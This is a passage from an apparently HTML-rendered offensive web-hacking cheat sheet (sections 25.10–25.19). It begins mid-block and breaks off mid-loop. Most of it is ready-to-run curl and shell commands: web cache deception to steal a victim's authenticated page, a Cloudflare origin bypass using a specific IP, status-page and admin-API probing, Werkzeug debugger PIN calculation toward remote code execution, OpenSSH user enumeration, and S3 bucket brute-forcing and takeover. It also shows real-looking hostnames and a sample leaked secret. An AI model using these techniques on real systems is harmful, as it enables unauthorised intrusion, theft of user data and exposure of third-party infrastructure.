&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://admin.TARGET.com/dashboard/settings.css&amp;#34;&lt;/span&gt; -D - | grep content-type
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# content-type: text/html (NOT text/css!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. If X-Cache: HIT → WCD confirmed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Attacker sends victim to: https://admin.TARGET.com/dashboard.css&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Victim visits (authenticated) → CDN caches HTML with the victim&amp;#39;s data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Attacker accesses the same URL → receives the victim&amp;#39;s authenticated HTML&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2511-staging-ip-bypass-cloudflare-bypass" &gt;
&lt;div&gt;
&lt;a href="#2511-staging-ip-bypass-cloudflare-bypass"&gt;
##
&lt;/a&gt;
25.11 Staging IP Bypass (Cloudflare Bypass)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Staging subdomains behind Cloudflare can be accessed directly via the origin IP:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Discover the real IP (DNS history, crt.sh, SecurityTrails)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Access directly with --resolve&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk --resolve &lt;span style="color:#a6d189"&gt;&amp;#34;hmgadmin.TARGET.com:443:51.222.42.163&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://hmgadmin.TARGET.com/&amp;#34;&lt;/span&gt; -w &lt;span style="color:#a6d189"&gt;&amp;#34;%{http_code}&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 200 → bypass confirmed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Staging frequently has:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - APP_DEBUG=true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Fewer WAF rules&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Weaker authentication&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Real staging data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2512-php-fpm-status-page--real-time-intelligence" &gt;
&lt;div&gt;
&lt;a href="#2512-php-fpm-status-page--real-time-intelligence"&gt;
##
&lt;/a&gt;
25.12 PHP-FPM Status Page — Real-Time Intelligence
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Requires correct Host header and a browser User-Agent&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s -H &lt;span style="color:#a6d189"&gt;&amp;#34;Host: cp2.rx.ritux.com.br&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET_IP:80/status&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Reveals in real time:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - pool: www&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - process manager: dynamic&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - start time, accepted conn, listen queue&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - active processes, idle processes, total processes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - PID, state, start time, requests, request URI, request method, SCRIPT FILENAME&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Script path: /var/www/ws/index.php (server&amp;#39;s internal path!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2513-ory-kratos-admin-api-detection" &gt;
&lt;div&gt;
&lt;a href="#2513-ory-kratos-admin-api-detection"&gt;
##
&lt;/a&gt;
25.13 Ory Kratos Admin API Detection
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Kratos Admin API returns 401 (exists!), not 404 (blocked)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://openid.TARGET.com/k/admin/identities&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# HTTP 401 → endpoint EXISTS, only needs the API key&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://openid.TARGET.com/k/admin/config&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# HTTP 401 → Kratos configuration exposed if you have the key&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Public endpoints (no auth):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://openid.TARGET.com/k/public/schemas&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# JSON with identity schema: fields, validation, additionalProperties&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://openid.TARGET.com/self-service/login/browser&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 303 redirect → login flow (no rate limit?)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2514-werkzeug-debugger--pin-bypass-calculation" &gt;
&lt;div&gt;
&lt;a href="#2514-werkzeug-debugger--pin-bypass-calculation"&gt;
##
&lt;/a&gt;
25.14 Werkzeug Debugger — PIN Bypass Calculation
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If SECRET is exposed (e.g., 5BcAmPHc89fmWT3Tdflg) and EVALEX=true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# OR if you can calculate the PIN from server information:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# The Werkzeug PIN is calculated with:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. username running Flask (probably root or www-data)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. /etc/machine-id or /proc/sys/kernel/random/boot_id&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. MAC address of the network interface&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. /proc/self/cgroup (first line)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If any of these values leak via stack trace, LFI, or info disclosure:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Calculate PIN → interactive Python console → RCE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Calculation example (Werkzeug &amp;lt; 3.x):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;hashlib&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;itertools&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; chain
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;def&lt;/span&gt; &lt;span style="color:#8caaee"&gt;get_pin&lt;/span&gt;(machine_id, boot_id, mac_address, username&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;root&amp;#34;&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; probably_public_bits &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; username,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;flask.app&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;Flask&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;/usr/local/lib/python3.x/dist-packages/flask/app.py&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; private_bits &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [machine_id, boot_id &lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt; mac_address]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; h &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; hashlib&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;sha1()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# ... (implementation depends on the Werkzeug version)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2515-glpi-statusphp--internal-paths" &gt;
&lt;div&gt;
&lt;a href="#2515-glpi-statusphp--internal-paths"&gt;
##
&lt;/a&gt;
25.15 GLPI status.php — Internal Paths
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET/status.php&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# GLPI status page reveals:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - DB status (OK or PROBLEM)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - AD connection status (AD1, AD2, AD3)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Installation path: C:\xampp\htdocs\glpi (Windows!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - GLPI version&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - enabled/disabled APIs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2516-iis-traceaxd--aspnet-confirmation" &gt;
&lt;div&gt;
&lt;a href="#2516-iis-traceaxd--aspnet-confirmation"&gt;
##
&lt;/a&gt;
25.16 IIS Trace.axd — ASP.NET Confirmation
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET/trace.axd&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# HTTP 200 with &amp;#34;Trace Error&amp;#34; → ASP.NET trace is enabled&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# (even with localOnly=true, it confirms ASP.NET + IIS)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET/elmah.axd&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If 200 → public Elmah error log (full error dump!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# WebDAV test&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X PROPFIND &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET/&amp;#34;&lt;/span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Depth: 1&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If 207 → WebDAV enabled (possible upload/ls via PUT/PROPFIND)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2517-openssh-user-enumeration-cve-2018-15473" &gt;
&lt;div&gt;
&lt;a href="#2517-openssh-user-enumeration-cve-2018-15473"&gt;
##
&lt;/a&gt;
25.17 OpenSSH User Enumeration (CVE-2018-15473)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Affects OpenSSH &amp;lt; 7.7 (Ubuntu 18.04 default)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Valid vs invalid username has different timing&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Simplified manual test:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; user in root admin ubuntu deploy www-data git; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;time&lt;/span&gt; ssh -o &lt;span style="color:#f2d5cf"&gt;StrictHostKeyChecking&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;no -o &lt;span style="color:#f2d5cf"&gt;UserKnownHostsFile&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;/dev/null &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -o &lt;span style="color:#f2d5cf"&gt;BatchMode&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;yes &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$user&lt;/span&gt;&lt;span style="color:#a6d189"&gt;@&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$TARGET&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; 2&amp;gt;&amp;amp;&lt;span style="color:#ef9f76"&gt;1&lt;/span&gt; | head -1
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Timing/error difference → confirms user existence&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2518-robotstxt--sensitive-paths-revealed" &gt;
&lt;div&gt;
&lt;a href="#2518-robotstxt--sensitive-paths-revealed"&gt;
##
&lt;/a&gt;
25.18 robots.txt — Sensitive Paths Revealed
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/robots.txt&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;disallow&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Frequently reveals internal paths that should NOT be indexed:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Disallow: /admin&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Disallow: /internal&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Disallow: /config&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Disallow: /api/internal&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Disallow: /*/setcreditlimit ← sensitive endpoint&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Disallow: /*/card*&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Each blocked path is a potential target&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2519-s3-bucket-detection--three-methods" &gt;
&lt;div&gt;
&lt;a href="#2519-s3-bucket-detection--three-methods"&gt;
##
&lt;/a&gt;
25.19 S3 Bucket Detection — Three Methods
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Method 1: Direct S3 URL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://{BUCKET}.s3.{REGION}.amazonaws.com/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 200+XML = listable | 403 = exists/blocked | 404 = doesn&amp;#39;t exist&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Method 2: Domain CNAME to S3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If subdomain CNAME → s3.amazonaws.com and returns NoSuchBucket&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Subdomain takeover potential (create bucket with same name)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Method 3: Brute force naming patterns&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; name in &lt;span style="color:#a6d189"&gt;&amp;#34;target-prod&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;target-dev&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;target-static&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;target-uploads&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;download.target.com&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;static.target.com&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;media.target.com&amp;#34;&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
